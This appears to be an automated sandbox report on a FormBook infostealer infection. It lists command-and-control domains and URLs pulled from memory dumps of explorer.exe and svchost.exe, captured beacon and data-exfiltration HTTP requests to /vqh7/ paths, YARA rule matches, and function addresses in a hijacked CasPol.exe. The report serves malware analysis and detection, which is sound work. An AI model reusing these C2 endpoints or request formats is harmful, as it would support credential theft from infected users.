          Source: explorer.exe, 00000002.00000002.537406866.00000000156B8000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.525637828.0000000005AE0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.525015381.0000000003A98000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.jewelryimpact.com/vqh7/?4sHXq=qmMaHdA-N1MF&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.e
          Source: explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.krankenzusatz.net
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.krankenzusatz.net/vqh7/
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.krankenzusatz.netReferer:
          Source: explorer.exe, 00000002.00000002.537406866.0000000016024000.00000004.80000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.525015381.0000000004404000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.530473205.00000000085EF000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nativealternatives.com
          Source: explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nativealternatives.com/vqh7/
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nativealternatives.comReferer:
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nkgtrust.org
          Source: explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nkgtrust.org/vqh7/
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nkgtrust.orgReferer:
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.otopodlogi.com
          Source: explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.otopodlogi.com/vqh7/
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.otopodlogi.comReferer:
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.readyexechub.com
          Source: explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.readyexechub.com/vqh7/
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.readyexechub.com9
          Source: explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.specigain.online
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.specigain.online/vqh7/
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tobinrasheedja.cyou
          Source: explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tobinrasheedja.cyou/vqh7/
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tobinrasheedja.cyouReferer:
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.treebarktees.com
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.treebarktees.com/vqh7/
          Source: explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.verde-amar.info
          Source: explorer.exe, 00000002.00000003.473640182.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.535583859.000000000F6A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.474681321.000000000F6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.verde-amar.info/vqh7/
          Source: 50-ET7Wv7.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 50-ET7Wv7.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: 50-ET7Wv7.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: svchost.exe, 0000000B.00000003.361397877.0000000008012000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 50-ET7Wv7.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: svchost.exe, 0000000B.00000003.361397877.0000000008012000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.11.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: svchost.exe, 0000000B.00000003.361397877.0000000008012000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.11.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: svchost.exe, 0000000B.00000003.361397877.0000000008012000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.11.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: svchost.exe, 0000000B.00000003.361397877.0000000008012000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.11.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: svchost.exe, 0000000B.00000003.361397877.0000000008012000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: svchost.exe, 0000000B.00000002.525015381.0000000004272000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.krankenzusatz.net/vqh7/?u1ua=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6e
          Source: unknownHTTP traffic detected: POST /vqh7/ HTTP/1.1Host: www.specigain.onlineConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.specigain.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.specigain.online/vqh7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 31 75 61 3d 67 33 42 74 5a 34 56 76 30 4a 31 36 31 79 6e 48 73 72 56 6f 32 46 4e 78 4a 55 30 4a 7e 67 30 4c 4e 6f 67 6a 4b 4b 79 7a 47 33 6f 71 35 42 53 47 34 39 75 69 4c 6e 7e 50 45 63 79 68 7a 38 63 4d 52 38 6c 6f 44 41 45 6a 77 71 30 4e 71 36 77 72 4f 45 65 44 73 62 49 4f 4e 4a 78 6c 77 30 56 4b 4f 71 51 5f 4e 41 33 30 50 54 78 73 54 54 46 4e 79 53 48 7a 51 51 64 5f 68 4a 56 5f 65 63 50 31 47 56 65 63 77 35 47 6d 61 70 37 5f 65 56 63 74 49 58 34 4f 70 30 6f 49 71 6a 39 61 64 62 71 6b 56 46 59 52 6e 38 51 57 49 4d 69 6c 69 71 47 71 58 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: u1ua=g3BtZ4Vv0J161ynHsrVo2FNxJU0J~g0LNogjKKyzG3oq5BSG49uiLn~PEcyhz8cMR8loDAEjwq0Nq6wrOEeDsbIONJxlw0VKOqQ_NA30PTxsTTFNySHzQQd_hJV_ecP1GVecw5Gmap7_eVctIX4Op0oIqj9adbqkVFYRn8QWIMiliqGqXg).
          Source: unknownDNS traffic detected: queries for: www.verde-amar.info
          Source: C:\Windows\explorer.exeCode function: 2_2_085DC4F2 getaddrinfo,SleepEx,setsockopt,recv,recv,2_2_085DC4F2
          Source: global trafficHTTP traffic detected: GET /vqh7/?u1ua=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4/WAP1IcCYAcw2um1tEg7dOsgaRrguIqza4tr80FhnA0YyZCpgAYYfeGC89HM0oMMSxg==&4sHXq=qmMaHdA-N1MF HTTP/1.1Host: www.jewelryimpact.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?u1ua=t1pNaIlB57t+2Br13rtd5l5qJnwIoRZHcaYdKNODTQQHpRjo5OTeCknNVcCO080ObvYdOnMGhI5gsKQpTmmnmrZxModizUJoJg==&4sHXq=qmMaHdA-N1MF HTTP/1.1Host: www.specigain.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?u1ua=avntfzZWwL7S+bFx7xC7yR8pR0BqdKNL+mi6NO8or2/YUjOFXpJJhQb6NE3o2hVXLy/LWl7MJMKHcu5A7Cd4caz4W6nJ0FH5Jw==&4sHXq=qmMaHdA-N1MF HTTP/1.1Host: www.treebarktees.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?u1ua=pVoWNihbCh2zr5CHItakBz03v8qzOfTDGJe3fnCW5FC8ht3krgFCJJZSjJ8fBA0610Gm6f/qx36kmOqdgM55XyI7IXI3QKaXMg==&4sHXq=qmMaHdA-N1MF HTTP/1.1Host: www.gachthe365.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?u1ua=6yP+4zmmFGehQ93JjA+P25coRCWIpu4kk0hKva5GiC1xzxOLQ03YJLnHpsQLSqMsYpfBQcl74Zo/h4S4tn0LYNfYE0qlHbGzJw==&4sHXq=qmMaHdA-N1MF HTTP/1.1Host: www.frogair.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?u1ua=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+U/tSn+rF9O8jw==&4sHXq=qmMaHdA-N1MF HTTP/1.1Host: www.krankenzusatz.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?u1ua=7D8/lBzEw/wsNost5L+U4EiZQqgBuaFyWQoeh5HgHjAV29hA+52JaGKa2IA6i84+uhqZsECRoLQWyY+/mGhgcTKrDMHQPN2qJA==&4sHXq=qmMaHdA-N1MF HTTP/1.1Host: www.hotelyeah.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Windows\explorer.exeCode function: 2_2_085D5E22 OpenClipboard,2_2_085D5E22

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.523056179.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.523056179.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.523056179.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.523056179.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.523056179.0000000002920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004038531_2_00403853
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004218211_2_00421821
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0042196F1_2_0042196F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004232201_2_00423220
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00421B681_2_00421B68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00401B301_2_00401B30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00422BF81_2_00422BF8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004055AA1_2_004055AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004055B31_2_004055B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004206B31_2_004206B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0040BF7E1_2_0040BF7E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004057D31_2_004057D3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0040BF831_2_0040BF83
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004017981_2_00401798
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_00421F9F1_2_00421F9F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_004017A01_2_004017A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016441201_2_01644120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162F9001_2_0162F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016499BF1_2_016499BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016FE8241_2_016FE824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A8301_2_0164A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E10021_2_016E1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F28EC1_2_016F28EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016520A01_2_016520A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F20A81_2_016F20A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163B0901_2_0163B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164AB401_2_0164AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F2B281_2_016F2B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A3091_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016D23E31_2_016D23E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E03DA1_2_016E03DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016EDBD21_2_016EDBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165ABD81_2_0165ABD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165EBB01_2_0165EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016DFA2B1_2_016DFA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F22AE1_2_016F22AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F1D551_2_016F1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01620D201_2_01620D20
